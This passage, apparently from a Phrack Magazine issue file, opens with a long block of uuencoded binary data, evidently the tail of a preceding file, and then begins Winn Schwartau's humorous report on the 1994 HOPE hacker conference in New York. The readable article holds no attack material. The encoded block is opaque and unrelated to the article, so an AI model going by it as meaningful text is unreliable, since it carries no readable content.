M'9RP^);G7&C*V6D6MQ=74S#"1YA=$7/3<S2#`[X/I6:E>#925@T:[CAUF*3S;
M,$<],=Q4'CO6M(U/Q"99OWH,:,^PYPQ^8CKU&ZN:%^;0U:,V+6?#-J0$T6>8:
M@=3/M'Y!#4A\4:7'\T'AR('.<R2$G^0K1J;W8K(C_P"$UG6QN]/L]*L;9+N,=
M1R%$;)4,&'.X]P.U7=%L--O+)H[R%W8]A"SY'IC%)Q:V>HU9&A;Z)9:?$\5C/
MH[)$_4F':3]2<5F?V%]G=F:2VMUSP'NT&!]#FFE)_$+FBMB!8-,MY2UQXDT^8
M($]%G!/YJ*NZ7=Z)_:\"P:V+F<!BD:,6!PI[\=J'3>]@Y[HY"^U_3$\+2V(N*
M+@WIFWE/+^0?O=W7Z5LR?$+0@=B6-W.2<D&88)_`5M[!O9=63SON?7OPV^!'=
M@;6?AWH$]S`]Y.^GQ$W*2M&S9&X`@''&<?A5Z;]F30XXH1IFK7UKY#%X5=4D/
M5"1@]L]/>HJT(U$XO9BA7E3FI+='6?#_`.'TW@JRNX9KQ;R2XF\TR+%Y?8#I+
MD^E=$UJ<'Y2*=*BJ4%!;(*M;VLW-[L\A^*GPCNO&&H2?O#';-L1PI`+Q;V:1>
M>3U;]W_WS7>^`=&O-.\-6D.HHBW8B3S]G*F3:-Q'L3FM.9-)=A6MJ;LMH"O38
M&!7S?\2/%7A[7_B:T%]X5N9KKP[<#%S#Y<QF488J8V*\?>[G&:YZU>-!<\G95
M(Z,+AY8B7)'<AN_B=\$-?N98+SP@!+$"9F?28P4P,G)4YZ5GG3?V=?$L;^3'1
M#9LI(9E-Q"%(]_NUZ%/%5XI-/]3DG0BFTUJ=1X@^"7PP\6.\Z:;?>&;TG._3O
MWW0Y]?+;H/9<5#IOPQ^*'A>$V_@_XF66LV7066HC&X?W?+D#C]17G9/QM@<QM
M@J.,5I>?Z/\`X9^IKBLIK4'S4MC0T[QI\5_`DX&M_"JRO(D?>9-,@(YP!NS&S
M74'@?PBJFJ?&+PSKUU*VOVOB?2KEVR\,T2R1+[$*8V('O7T-3+*5:-\-/Y?U6
M_D<4,3.#_>(W_"OCGP%:V\KQ>)[*6Y`_<03VTEG"#ZOA6!Q[DC^=6[2X?4[]?
MKJRUJQO)Y26(L=0@4Y]R&,IKS*V78BDM8G33Q-.;W.[T70(_$>C?8?$0-TH;)
M/E2LV\>ARS%Q]>,Y]*Z^."*.!8%11$JA57'``Z"II0<5=[F=65W9;%*X\-Z->
M=-NFTJR=AT8PKG\\55E\$Z#(.=.B5AT8<&G*C"6Z"-6<=F>%_M->"]+\*^%/K
MM5C)=;[C>K+)-N50!V';K7F/ASXEZEH_P0T?1=-F\F.6RE@FP,D[YG)QZ94,'
M,CUKGJ+E5D:P=]SR?6_#=MKMQ'+/+-"Z#:6C4-N7TP?YU+I/@/2[:0LAU5RRB
M%&Q+&N5(P?\`EF:J-=QCRV!PUO<ZFS^%6A3N!)HM[<!5"@RW+DX]/EVUTC?!H
MU=.MX)_"WA9IQ,"6>%YIMI`'!^8XZ]ZGVTWI87*NYHZN+S1O#VF:1K&H>'=$H
MO$>>X>+4OL\9\I_+5"%<$ELQOSC.`/45R-YXOT6W`TS4/B)826J`NJ0M/-`IE
M]`$0@'\*CV4YZ+^OT+YXQ.9OO&?@G2Y@\6JW=^PS_P`>UJRC\Y-O\JY;4_'FP
MCR2DV-A>;3WD90?TS6\<)(AUK,RY?&['B.SVXZ;I?\!59_%][(<10VX)_P!E)
MB?YUM'"I;L3K/H":QXD<AH(ID]TM_P#$5IZ:?&>IL(_M]]&I'3S0OZ9%-JA!%
M:B7M),V)?A]JSQ^9=7DTC$9)ENR!^F:Q9_!2I*?,U&%3GH&+UDL73CHD;+#RU
MD!\*Z=;C?+?2-CM'%C^>:W?!=E8PZM&8A<M*L<A0N0`/D;L*RJ8ESC9(T^K.M
M"NSGKQ+$Z8Y%GBY`^:0R'.<^G2M73+VWA:,PVEI&PQ\WE#-$I5''?J5&G33U8
M/K_P3\%='\6>';/Q$-7US2-7F4I+<:;?&)6\MC&ORX(P`@''I70)\/?B5H1''
M]A?%6YN$`^6'5;%)OS?.?TJ86LC&;3;)D\0_'30AB?0?#'B%%'WK2Z,#G_OOE
M`K)U;]K)_!-Y%8^-_`6L:+/*,J4E296'<@C&?PK92:TN9.G%[&]H/[5GPN\0(
M[0VL?86/\-Y%L/\`6N]T;QSX4UY`VF:YIMR#C`CN%S^6:KF7VD0X26QM!(I%0
MR""".H-<QJGPS\.ZA<S77]G68FG<O*YMU+.QZDM]X_G2G2A-695*M.E*\3S+;
M6?V3O#\VI7-_IOE6LEP29%PSJ<]?O$D=.QKBS^QY>:4+I(KZ.[AF8NO)C>,D^
MYXQP1['MW'6J7,E8OG3=V>_W&EVE[GS[>-_<CG\ZI2^#;*1LPO)#Z#.X?Y_&%
MOD<?D&%QOO6Y9=U^JZG=0QM2EIN@@\/ZG9$"TU-@!T&YE'Y<U)/#KTD?EW*6L
MU]&/X941P?SKRZ>!SK+7_LU7F2Z?\!_HS>57"U_CC9F+>^$-"O21J/@729"?A
MO-%:^6WYK6'/\)?AXMRLS>%KNVQ_`M[)MSZX;->G1XYS3!QY<32?KJOS3_,YD
MI950J.\)?U^!FW_P-\`ZA,TT&H^(].G/.\3)(`?Q&?UJJOPG\;Z%E_!OQ:=\0
M'Y+>^>2(?3!+*?RKZ/+>/,NQS5+$1L_/_/;\CAKY17I>]!DJ>/?V@O!43-K?)
MA&TUVSCSNGA"F0@=P(23_P".9K#_`.&\K*QG:WU;P5=VQC.UBEX"P/?*,HQ^5
M=?23P>'JQ<Z$].W]:G%&<XNTT<I\5?VA-#^-OA:ZATC3]1M&TY"TAN@@#;Q@8
M8VD_W3UKQ_P[^T5?>#O#EIHEGX4\/W+6L7E_:;N)Y'?YW?)&X`??(_"O)]A>C
M;BWL=7/9:'.:O\;/$.IWDES'::19&0Y*6UF`H/L#G%9__"TO&MT=L&L7*'L+&
M>-4/_CHS6JH4XD.38-KOC_54\MKW795/=G<?J:KV.A^*;6<3027%I(K%A(+GB
M:RGN<@YI.="&FA483>Q/<^&M3U.Z:ZU76HIIW^_)+.TCGZD]:Z+PS;:5HMG)C
M9W$FGSL[[Q<20OYB<=`5SQ]?7M7+6Q,7'E@=%/#RO=C?$NK1ZM$FG75TMQ8PY
M,IB2.W5&'_`L;NE9*VNAP_<TUG(_YZ2$_IFLE6G&-HZ&RPUWJ+]HLX?]3I=H\
MF.Y0&G'6YH^$\J(>BKBI;E+=FJHPB02ZS.WWKEN?3_ZU2:?J+F4?OY3_`,"Q[
M^IH=)V#VE.+T-FYU5'MQ$VH1HH&"-Y8G\JR[77O[*D9H?*GSQEXR1C\:B&'T+
MLPEB>R*MUKDER"H"J&.<*N,?2M#P;=N^KMR05MY6W$G(^4UNZ2C%F$JLI&"7*
M>6T=>H"$DTZ"Y**I&6P!@$UM8S['V5\-OVC?"?ASPWI^B:NM]:RVT2I).(-\F
M;N>2<*2PY)[5Z3I'QA\$ZXRBS\2:<6(X267RF[?PO@URJ36Z*<=3JX-1AFB#[
MQ2*Z$9!4@@UY?\8OA"WQ/OHKCS[(>5$(D6<N"O))(('N*)MNW**%D]3RJS_9B
M4O++7K,W$+7-J)E,K031L@0$<D$YQ^%>]W7P2^'&HMYG_"*V%M+_`,]+,M;,!
M/QC*UK&K)K4<DH[$4_PF%D&?1_&OBW3B%^53?BX1>/256/ZUCOX+^*.BQJNC-
M_$N*\"C")J6G=O=E8Y_*G'E3V);N59?$?Q^T/&=(\*Z\!_SPN3"3^#[1^M<SM
MXV_:<^)?@?3#)K/PJ:V8_*MQ]M#0JW;[@;/_`'T*V23VE]Y#BCW9'V].*FCD/
MY[5YB+)D<%NGI4B$#O3`D6G%<'GIZ46%<SM02SEF^S)9Q7%P1R",!!ZLV./I=
MU/YD<UK]KHNA0/-/=@3J"3EL1K^!/`_'/UKPLQR/"8E.27++NN_G_5SLH8NI\
M2TO='C7B;X^W.C7$L6A7I\Q21YF?D_!3P?Q'X5Y=XM^)B>,93+XFTVTU2;H)9
MI(P6`]O3\,"EDM+%8&'LYR?IT7H=.)A1KKFB<];KH\>AZT^DV1M=\2^8-QYZY
MXZDX[UPVFP:8MC')+IZ3RLN69V[Y/;Z8KZ:->?*Y7U/-5!<_(^A9CNH(#^XT!
M^SCQW$8S4IUJZ5?EE6,>BJ!64I2ENSJC0A$@?6)N=]V_TWFJKWT9))<L:<:4<
MGT&ZM.&Q&;Y3]U":3[7)P`BK_O&M%1MNS-XGLB*6XDW`%DZC.WGO0TS'^)L?6
M@*T5.*,76DQA8GUX]2:;ST`'X"K2L9MM[A@^E2VLT,);SK4S\?*-^W'Y4WMH1
M+8CEW2N61!&IZ#.<4FPJ@7H3U)H&*(\+@'YL]:W_``1&$OKUR-^VQF.#]!4S.
M?NL#GY)U%AY<2MDK\Y(]J+'<50D<`5:5D)O70[.VED\I`9,L%&2:<]RR#YAD4
M#WK*R'<:OBW4-$B9M+U>ZTR8#*R0SE,'\#4VB_M5_$W0G"_V_P#;8U.-MS&L>
MF?\`@1&?UK2.'A-:DRJ.)W&@_MQZ];RI_;'AZQND48/D2-$WZ[A^E>D:#^W!J
MX*O<+J%EJ6GNW7Y5D4?CD?RJ'A9P^'4:JQ>YW>E_M)_#K7(\6_B>T5B/NS!H<
M\?4L,5UFF>--&UH`Z?JMC=`=/)N%?^1K*[B[-6+]#1%[&PX<#Z&OG+]KGQ2D.
MUQIFAPR9*`SR`'IV']:TCN@1UGAWXTZG);&>VUC2]5MD`+&[_<F,?[5Q%YD)J
M;V^6NUTOXQ6S(K:KHNIV0/W98HQ=1,/[VZ$N%'NVVN1TY1VU_/\`K\0.HT'Q!
MMH'B$%]+U>RN@IPWE3*=I]#CH:W$E#`%2#]*E.X/0F27%,O+MMT=O$^V67/S(
M#&44=6P?J!]2*K9$K<XSXB_$6P\"V;6EN5,Y&3\W.?<]2:^7_B#\4=1U^63?6
M<-LR<*#P/>L+<\[=$.YY;>:C<74K8+X'ZU1>YNU'W7P/5:[O9P:LPA4E#8U]/
M$N9WT#6=R`#RT]O[U<C:7$@M8T#``+Q^9JJ=.*37F-U9<W,A3(YZR-^%)^9^H
MIK5)+8ARE+<3@?PK1M]Z86%Z<9/'O2<#M2`1S@?B/YTNZF`9`I-PH`-V*-U`2
M"@^](6P/I18!DMY#;J/,8*?S/Y5O>`]1BNI-8V(WR:;*W('JHHE!\C8N=)V,=
MB58Q8(\395HR#[,!S_C_`/JI=,",L,9"H&P"<4];#ZFW<RS)&WE<-VXXK`OV/
MUV7GS#M](VQ13Y?M"G?H8D\-RA+31RCU+`U!TKL5NAS.ZW#.*4-BF(E1R.AZA
M59@U6]M2##=31D=-KD4.*>XU)K8W-.^*WC32`%LO$VJ0J.BK<-C\JJ:IXZU[O
M7+TWNI:A+=W!&"\O)-3'#TT[I%^UD;&FRZ9%.MSIVIWVBW*X!D=F*H?:6(;A)
M]!&?K78:/XX\:Z'&C64L6LMO>5W@#/(RC;@N\)$GKQ(1[BN6<5+XOZ_KS^1:5
M;6QU&F_M"65Z('\2:*)IEY:XDMXYRG)&%D78T?3_`&C7J'A?XC6<T4$ND>(;]
M^Q60>8(_MBW2D'I^[GQ.<^B?I7'6HVW_`*_K[C:,K['>Z1\1O$HG%NW]C:H^0
MW<(MSV-R1_UQD#9^I8"MNR^(;1^==:MX=UFSE'"Q);^>0@'K$74<D]2.,5S>'
M\G9:_F.Q\X?%7XU^&=7UBY9M%UEV1BK><PA''_`6(KS>Y^(5B'S:^&+#CI]H6
MEDD_D5%:0P\MV[$W*%S\2M5QBVMM*M!Z16,9_P#0PQK"U+QAK]VP0ZG=`-DE@
M(FV`_@N!733P\$]=?4EZ(VO">TZ'J[7>\M]G5F#[MS$;L#GBN,@):-=ORY'3_
M\ZNGO(J:LR8?+@9_.C=BK$)OQWQ32X'O18`WGTHW'VIV$,<\@9[T9Q3`0O@T7
M;LFBP`6QZT!B3@$TP+$5C=RXV0OCU(P*IW\K60(;&X=!GO1&S=D)Z*YC,S2,B
M68Y)[UUWPZ^2U\0R>FF,/S9?\*UJZ09C#XC%LIV6T9#Q@D5+#=2((5@_UI90Z
MO?FI<=31/0[E$+C<RJ">2%'&?:C[,A!Z"N38V(IM.A.2A+8Z9%4+C0+>4$M%%
M&2?]FM(S:$XW*$WA"WD)\I2O^ZQ_K5&X\(R0_=D/XK71&MW,G270JOX?O(^BD
MAL>E02:9=Q_>@D_`9K:,TS-TVBO)%)&<,C+[$8I]O:S74@C@A>5ST5%)/Z5H*
MFD19['I?]M:]?1R-JMCI?B^$+G[05)N=HQR9(RDZC_KIQQTJLJ>#M3M8'@O[Y
M_P`.2K(VS[1']K@#_+G$D85P.G\#GKS7%MMJNQJ:ZZ!XJO\`#V<FG^,8`F&:'
M"1+R;'/9A]I3\%7ZU:U?3WDTF-I;)[5XX0K0%&!C(_APY+#\23ZUC4LK6_K^`
MON-(W.]?X;^+O`WAZPD7Q!J'[Y1)<6$Z,;?'4A58%2<<9Y.?S'.3_&K7]-%S=
MICVMK-$J>2I6>XB(4J,91)`AZ]=O-<KY7K:QT48N4N4\U^VS7\UQ%.B@,.`/R
M0Y_^M69&Y,"'OM&:Z8VMH9SBXNS&,^.M$=R8E95&<^N"/R(JFKH49<KN;_AB:
MX:32=9`54`@7A1QW]:Y.*54BCR0O!ZG%*FK70IRN[BF90>&&/K0),@8Z5I8F#
MXH-!8B@!`?TI<T`-/5?K2]J`&8;/2G=!R:8"%O0U):W4UF_F0X#=BR@X^F:+2
M70;#KK4KJZXGN)''H6X_*L6]F\R7:#PO'XU=**6Q%1Z$6S;UR/2NK\#DQZ%X7
ME8=?LB)^;_\`UJJK\']=R(:2*5GX:OC!NE*0CDX8Y)_`5MZ%HL$-C:WK(C2.;
M"P;>"1VZ`\?C652HK:&T(6W-A><`>G2GJ%..>G7)KG-0*J<A03@=2:;AAP","
M4T`H21&!>-MK#(X[4K*#]W>`/6F"$\A%;+R1D'J".:M6^A>>F?(8*?XF4C'^:
M-/FL-(L0>';#S`%`NV&`8T&!GW/_`.JM$:-+;QL;>T@A&`"L2!>.>3C&3[FI.
MYG)^\RK<NQJZK\%M*-VHTJYO-"U`MF.,[F3(Y+*C8DXXY0SUS>L>#?%UFSK?(
M:9%XF\L%G,0DEFV'',FS;..@QY@4>G&:N%53UZG,XM;'+I;:%,%<&^TBXC;&M
M["S1QM]1M*?DY]S7I>A6K:KX/N-VHC4)S+$B73-(V\<#.9%5CC&.0*5?S0X>K
M1]'6?P1M=8\$)=7^MWLK-%YL2[^$(Y[^E>!>'/!GA*ZUV[GUCQ!IIN0HQITDI
MODL"%`&7DVH<XSPQKS,?"JL,_J_Q-'?@)QC7O/8\S\0Z='IWB298Y+(0N6")Y
M!=1S8Y!'*$CMZUS$H,3R)TVR,!^9KNP]U32EO8SQ;BZK<=B%LTBY8X45T'*=)
M'X3&W2-<VL"1`N1^)KCEOH((@K-EAV`HIQ;;L3)I"?VO$.`K@?05)%-#<Y\L>
M@-WXK1P<1*2>A(F#[$<'FEXJ"D'`HP`,Y&:`$)4.O!/!ZTIE(Z8'X4[`1/(#X
MU:FF4#@`TTA7&&?'<5&]P0/O<?6K426R"2ZP"%QFJZ]:TBK&;=RR%40'(YQG#
M-=%X6_=^$?$4@."5@3]36=3X?N_,N.YC6^I7D:A3.Y`/1CD?D:O67B"YL(A`G
M$1T!XW9R/84Y4T]`C)HTX/%ENZXFAD0C^Z0:OP:[83`;9XT/HW'\ZP=*2-5-8
M,OP21S+E&5AZJ<U,$0Y4`EE'`P>>>W^>U8MM,U2)H(9"X4(RD#&%`Q^)K1MM1
M)L[6-9M2U.&-6!^13DD^G2HG)K979<(I[Z&A:+;QQ[]/L5C!/^OFX/X`\_AQJ
M5Z2TAF4"XFDN2!PI(51^`Z_CFHUO=[EZ+8D@4*5$48C"`#'`%687B$O*!@3U*
M5J>HCZ7U?X7V>H6C1Z=>`V[@9MKU?M,#C.>K?-GW)('I7":Y\.+W3<"ZL+JWI
MBB;?')"OV^V#G@85AYD8'!^3RP/6L.5P5X;=O\CGOW.;U'P>OB&T22]L++Q%,
M"`42YA=;A_<DR.LXQTVQW!^E'@CPUX7T+4&TZ^LYOLKR(\=A`SI,H&2S-'.59
MDVDDXV%S[FM?:J:MV_K^NGH.UF>H:EING>,[!M"\,^/K_1#/`T4E@R(LSQG@<
MX65/-48&,KBOE?Q#X.N;SXDW6AK+$L@>2(R2/A?DD=<Y/^[48B<:%&4^RN=.\
M"BYUHKN<3K>G1Z/XD6TCGCFV2,FY#D'@C(K*OQB[F'^UG]!6^&FYTXR:M="Q6
MD5&JTBH02V*J7VHBV_=Q<M_GK77&/,['#)V.@^&[M=6_B`R2G(L@0/\`@7I7Y
M%7`Q,U:05IR,Y/W41]*=%*T+AE."*U)6ALK('"LO`84O3MFN;8Z!#)MXSTIAA
MFSTII"N1M.0W7IQ3&FS5I$W(FN0O\51-='MFK427(89F/M3-Q/6J2L1<;3EX8
MIB)-YV[>W>NIT']W\/-:DQ]ZZA7]":RJ?#\U^9<=SFP^/:G2,%D/UK0`$HQQW
M5O3;&YU.<06Z%CWQV%)Z*[!'9Z!\/2S^9<S+"!T)D()_*NGM],TC3RT9GENIU
M%Z8DW%?;T'XUYU:LYNT4=E."BM2)Y%F8*,P*#@#&6/X]/PQ^-3P6=@)=RIVP"
M6D!+9_&EJBM#2@TN-E#KC!_V<<5/#I<,>2O+<\9&3^=1S%V)K6*)AY<D4BDY:
MP2Q%.,(52BRR''3=(?YTT!ZUX%\4:U9VT*:EJ-A:74[;8'L2\<<Q^4D/%(-HA
MD^9>G7)`QCGTG3O'=[;MLU*R6;!^_;_*P^J,>WU_"N1R]G)I;&&Y<DTCPAXRW
MN3/Y,2WQ`W2PLUO<X'3)7#D>QX-9&L?#35#;M!;7=AK=GDL;35H%!)_WU4J`4
M/^N9/O6C4:CYHO46VC.0UCP['IL#6NI6.KZ+`"3MN(A?6#?[1W>8J(/3,?T%1
M4)-`OVT=?['MM(UC3F+28L7A"R$G)(AN1)#U[AP:F,Y0M&:_R_K^K%1E9WB?<
M-7Q`U*X3Q%=03:5:6;PR$!(;.VA*^Q:$8/X'%<A/*TDC.P`9CT':N^FM+DREE
MS:E.^N1:P''WST%8;$LQ).2>M==)65SGF];'8?#5V4:RJG&;(Y_,5R5P,3-1Y
M'XV)_"B/I2=*U(+]K,1;H,_=.*E><#N36+6ILGH0M<8[XJ)KH#H:I1)<B(W#2
M=J89&/4FK2L0V-Z4O2F(*.E`"4HXZ=J`%+$UUVGYC^%M\V.&U)!GZ)6579>JM
M+AN<JN6.`.:Z+2O`^IZZS3PQK';[B#+(VT9!Q]33J5(TU=CA%RT1T5AX(T32*
MI%;47:Z/38&VJ3^!S700PVT$1CT[2H[:,CASP1_4_I7GU*TZC[(ZX4E$>UL`R
M1YLOF8ZKG`_Q_/-.C>U(\L!H@O0+C`J4WT*L/<Q$*(Y`3CD`<T^UC9Y.&*XZ0
MDG&*=[+4+%MG\GF)RQQG(:E35Y5;YD\SCN*2C<=[%F+6XY-O[I5'>K*ZA$[$5
MHQ#8ZEL?SI\C0[E.;XS>#M>\+QW6H0,D\6H++>:>RAC,&B>,LF>OWE/)R-@Y;
MS75>#?%S74:GP+XP2XA09_LK4\S(H'92W[R,?0FLZU*<-9K3^M3G4DW[IVMMG
M\48K0K'XKT*XTO:>;J-?M5IQ_$67YD_$9]Z]"\->*YKW3X[S2-:AOK?')5_/`
MBW=^<[A]">/2N-IPU1:U.CMO'L292\M\%3AV@<2!.,_,.&!Q@X`/6JU]8^!_-
M%!ED>.R%Q(F)9(W-M<;1ZLI5\?C6T:T6K3(Y7?0^:/VB-%^$/ARSFMM`CFN-U
M<D?[\.IR3!#WW[F8?AC-?._FX!R>17=0?,O+H0U8QKZX,\QYRHX%0>G;%>A%7
M65C!ZL[#X:+AM9SQ_H!Q_P!]+7*W'RR$X'7TK*/QLO[)"V,9'2FULB"19MB!L
M133,Q[XI6"XS)/>CI3$%%`!1TH`6CI0`4H6@#0TOP[J6K8-G9S2)W?;\H_'I+
M7<Q^''T[PC::3?2KMN-0+R>6<<!/4CVKEKUHKW5N;TZ;W>Q/9Z5!9[!I5A&AM
MZ^;R<_\``S_2G:5:W$EJ1).=BS2A$';YSG]2:YW*Z][5G0H\NB-"VB2$8"!6C
M/<YY_&I?-D,A;?C/'RG%9^I=R1&8[01NQUW`4C%"26<?\"`XH`>UD#M==JX]]
M<56DMY8Y.9'(/3!!%5%B9-&BA<ERQ]CBK$<4<JY\[!],=*H"/[&Q/RN7P>"I"
M_P`:;C8P697#8X);M6B%L>+=*DAN);659897BD0Y5T;!4^H/:N]J^AYVQZ'XY
M0_:"\5>&BD-Y*NK6HP"EQ]\#V?K^>:]&T'XJ>`_$=Y;744ESX6U0N1+<6\WDV
M-RI_C7AN=OWA7DXC!RIOFI;=4=,)WWW/3[+Q/XTL(EN+.[T?Q;8L-R^9BWN&<
M7L!(GR,?<BLKQE\8-"ET::S\2>&]:TF>12H66V6:(GV?(S^5<<(^T=X,J3MHS
MSY?U6[MC>RFT>1XBQVED"'\@3BL>\NMJ$`\MTKV*<3.3LC-IR#+5T&2.M^'3^
ME)]5YP#8,/\`QY:YZ1%*FL5I-FG0I8P#3:W,Q*.E`@Z4=*`%HQ0`9)-%`"XI8
M\<+O]U2:!V.A\.^"_P"V''G78B7/W4C9S^>,#\S79:?X4\/:0R)]F-S./XI!.
MO/Y8P/RKS\1B)WY(:';1H12YI&@T;,VZWMD5<XX&"/PXJIJJ.MSI%O+^\4RR0
M2?/R>%(YK""L_,TFR^))(R0-NP<$`G^54=+F:.&5,D8N)#GC^]]/>FDK"+-S_
M=/MVJ5'J#59;K9QY3$=SZ4U$&RU%L$(D52,]3G@#^E3+;(_2<`@YZ\_RHU0RR
M9;2Y&2CHZ#NO;\Z>MI.TW$08X!P:5T*S+<>E[U8.NT@=#Q^E2VNC06Y65\,/?
M0?UH4GT'9%F2TMG("R>7@9P^*Y[5]6M+,B&*19YB=JI%\Q)]\5K23D[$R:2/R
M+KW0"6+6V`1SL)_E61+$\+E)%*,.H(KOISYCAG#E9&>*4'%6R34T?Q9KF@$MD
MIFKWEGSDB*9E!^HZ'\:Z'4/C9XNU?1I-*U*]BO('&"TD*A_S&*YIX6G.7-:SF
M+4VE8Y%]0E?/W5^E5\D\YK912);N)TI\?%,$=3X!)BN=01U*DV3'!&.ZD5SU[
MQ)L)'N<5E'XV:;(K-POUIG2MC-A1TH$&,4=*`#%*!0!-:V5Q>2"*WADF?^ZBT
MDFNITSX6ZK=();R2&SC/8G?)C_=''YD5A6KQI+7<VI4I5'H;-O\`#_1[`CSG1
MGN).F)!A3^`YK:L-!$6(+'3HE3/.Y<UP5*\I[Z([(4HPV-&#3;JWN%>16E2)'
MONA05./53G/TJ5);*SR(H4A!`#!@<Y_/'Z5COL:7)/W3G]TR[,Y&#TK-OD7_@
M`(2C3U?!5(9&QGIV_K50(D6HHR)'1T+(QX)7I5+2[(2I<8=2?M,BX(.>M4G9_
M:!:XLVG+YH4DC/;(R?PJ1-&AP$1G=F&0%7/\A3]HT+E0ZXTZ\T2X\N:*2*1=*
MK;)(RIP1D<'VI(I#."X1E<G^#@?E5735Q&C#<M;*J2N0CCJ>@]C4HU?2K=VVP
M7"2L"&9849CZ?P_7^50HMO0=TEJ3)J-S+N^RZ/*=O4SD1_IR:BNI+U(6DO;R+
MVLT`Z0Q9/X$_X5:BD[/45^QST\?]NSB-7=HL_P"LGD/Z+_@*NPW.GZ'&;73K`
M62ZO<_>*<"NG5KE1&VIQ4N8U+L"RYQ_A4<VFP:G"R,,''!`R0:2ERZHAJ^C.0
M<U'P[=V`+A?-B'\2CI]169C%=<9J2NCFE%Q=F'2CI5$B=*.E`!TI5^N*!G2>T
M!E8WMXHX)LWY^A4_TK!N1B8D\5E'XV6_A("<FC&*U,PQBC%`"A33XK>29PD:]
M,[L<!5&2:-AI&YIW@35[X_-"+=1U\TX/Y=?SKJM'^'FEV:"2_62Z<=BV%'X#9
M^IK@KXNWNT]SKI8:^LCH;6,&W:+2[1D2/^&%0J@_RJS;:;?W+JES=);@XPF[7
M+-_+^M<.VLMSK]#<LM"M["3SFQ(%'(*[B?Y_RJ^;6&ZD`M7BCD//^IYQZ=OS`
M%9.=W<=C2.D*^W*J%/!!SS52\\'64@SM:,$X*H#@5"FXO0;C<SYOAT73-I=%6
M`<X#K_7_`.M7-:UH=W%XEM+&#+S6]FVYEP/X@,_K732JJ6YE.-K%6;3]7MYFO
M!AF`'))4D8]>:9X<O[&'49X[S=<1+</OBC?;)TX8#/K^>*VT:T)-R>ZTBUG9>
MK2[E>V&#F=!&R_D3FJ[ZGH]N2T+?;7G`"I&/,<'/;;QG\<^U1&$Y/W4-M16I#
M6N-0O+@>3;:)>X0X_P!*81;?PZFH;?2M8=MT]W%:`G`6*,.?S;I^5:)1AH]25
M+M[%V'0;6XQ+/=2WDBG.V=R1GZ=*T1+:Z:WEI;A.,8A'']*ER<M-BDDM3,U#Z
MQD8W:UL8S+,<9PW`-5?[/-PR:AK=V7`^["&P/I@5K%<BOU(>IKV=A/J*[;:(`
M6%IWV)AG]N:UK32K:PA*VT2QL/O-CEOSI.5M"DCS];13&"P4K],FFM:J4'E`H
M+]:CF$5)2Z2E20<#FJ=UH.GWRN'MUC.<[HP`U:1FXZQ)<5+1G-:SX;?2HA.LW
MRR0L<+D885DXQ7=3GSQN<DX\KL(%Q28Q^%:$ABCI0(ZCX<%?[<F$BED^QS<9!
M]JY^[3-TRCU(_6LE\;-/LE?%+MQ6I`H2M/P]X<N/$>H+96LD22$9!D)`_0&HI
MG-0BY/H5&/,[(]"T[X*V]JOF7]Z;E@`VQ`44#N,]3^E:]EI%IHY,5K;PQ``@Z
ME%P3CU/?\:\6IBY5[I:(]*G05+5[EW2=-DUI1)'Y<49X4]\^XQ_6M.#P=;&`2
M,[F5F!YD&1U].E9.7)H:;EL-!80^0(L%!DE>GX"JXG\R42/PZ'<K@9P/3%3JN
M%C:M--C+1W3;MTK!"=YP<G'W>@JY>:8Z,0\D1A&!L\O)_P"^L^WI67-<NUBM$
M'>R:/"QPC!FXPO3_`#ZU9MKZ6[C+2A#&5(V[3_CC'M1YA8U--B46J81(U!X\K
MM=OOTKB&O?L?C_4I\9:*R"+Q_>D_^M6E)[D3Z',ZY\44:Z:T^S22.'PRE51'5
M]B1DXK.?1;_4IVNE:TL$N'WD0;F)/OG`_2NR%)4DG+J92GSNR+</P_T_R7N)R
M&DN"G)\PXS]`.*T-)GN-`9K?3I3;IC+*G"G/MTJW5<U8CD4=2U<:C>74D:7#H
MK(X)P>GZXS21#SXRH[#O_P#6J-$AD<]Q%&LJE&4JI+$'/OQ6`+J;6IVAMI&MU
MH1P3N)8CG_"M81ZLENVA;C%OIT0BL80LAX,DG))]:W=%\*0PD7%XPN93R`?NV
DK]*<IN*OU81C<WEB"384D*!G;U%.GA<%2K#!)SG\JQB:`/_9Z
``
end



--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 23 of 28

****************************************************************************

                Cyber Christ Bites The Big Apple
                 HOPE - Hackers On Planet Earth,
               New York City - August 13-14, 1994
                     (C) 1994 Winn Schwartau
                        by Winn Schwartau

(This  is  Part II of the ongoing Cyber Christ series.   Part  I, 
"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July  22-24, 
1994 is available all over the 'Net.)

Las Vegas is a miserable place, and with a nasty cold no less; it 
took me three weeks of inhaling salt water and sand at the  beach 
to  finally dry up the post nasal drip after my jaunt  to  DefCon 
II.  My ears returned to normal so that I no longer had to answer 
every  question with an old Jewish man's "Eh?" while fondling  my 
lobes for better reception.   

New York had to be better.

Emmanuel  Goldstein  -aka Eric Corely - or is it  the  other  way 
around? is the host of HOPE, Hackers on Planet Earth, a  celebra
tion of his successfully publishing 2600 - The Hackers  Quarterly  
for  ten  years without getting jailed, shot or  worse.   For  as 
Congressman  Ed Markey said to Eric/Emmanuel in  a  Congressional 
hearing  last  year,  and I paraphrase, 2600 is no  more  than  a 
handbook  for hacking (comparable obviously to a terrorist  hand
book for blowing up the World Trade Center) for which Eric/Emman
uel should be properly vilified, countenanced and then drawn  and 
quartered on Letterman's Stupid Pet Tricks. 

Ed  and Eric/Emmanuel obviously have little room for  negotiation 
and  I frankly enjoyed watching their Congressional  movie  where 
communication  was  at  a virtual standstill:  and  neither  side 
understood the viewpoints or positions of the other.  

But  Ed is from Baaahhhsten, and Eric/Emmanuel is from New  York, 
and  HOPE  will take place in the Hotel  Filthadelphia,  straight 
across the street from Pennsylvania Station in beautiful downtown 
fast-food-before-they-mug-you  34th  street,  right  around   the 
corner  from  clean-the-streets-its-Thanksgiving  Herald  Square.  
Geography notwithstanding, HOPE promised to be a more  iconoclas
tic gathering than that of DefCon II. 

First  off,  to set the record straight, I am a New  Yorker.   No 
matter that I escaped in 1981 for the sunny beaches of California 
for  7  years, and then moved to the Great State of  the  Legally 
Stupid  for four more (Tennessee); no matter that I now  live  on 
the Gulf Coast of Florida where the water temperature never  dips 
below a chilly  98 degrees; I am and always will be a New Yorker.  

It  took me the better part of a decade of living away  from  New 
York to come to that undeniable and inescapable conclusion:  Once 
a  New Yorker, always a New Yorker. Not that that makes  my  wife 
any the happier.

"You  are  so rude.  You love to argue.   Confrontation  is  your 
middle name."  Yeah, so what's your point?

You  see,  for a true New Yorker these aren't insults to  be  re-
regurgitated  at the mental moron who attempts to combat us in  a 
battle  of wits yet enters the ring unarmed; these are mere  tru
isms  as seen by someone who views the world in black and  white, 
not black, white and New York.

Case in point.

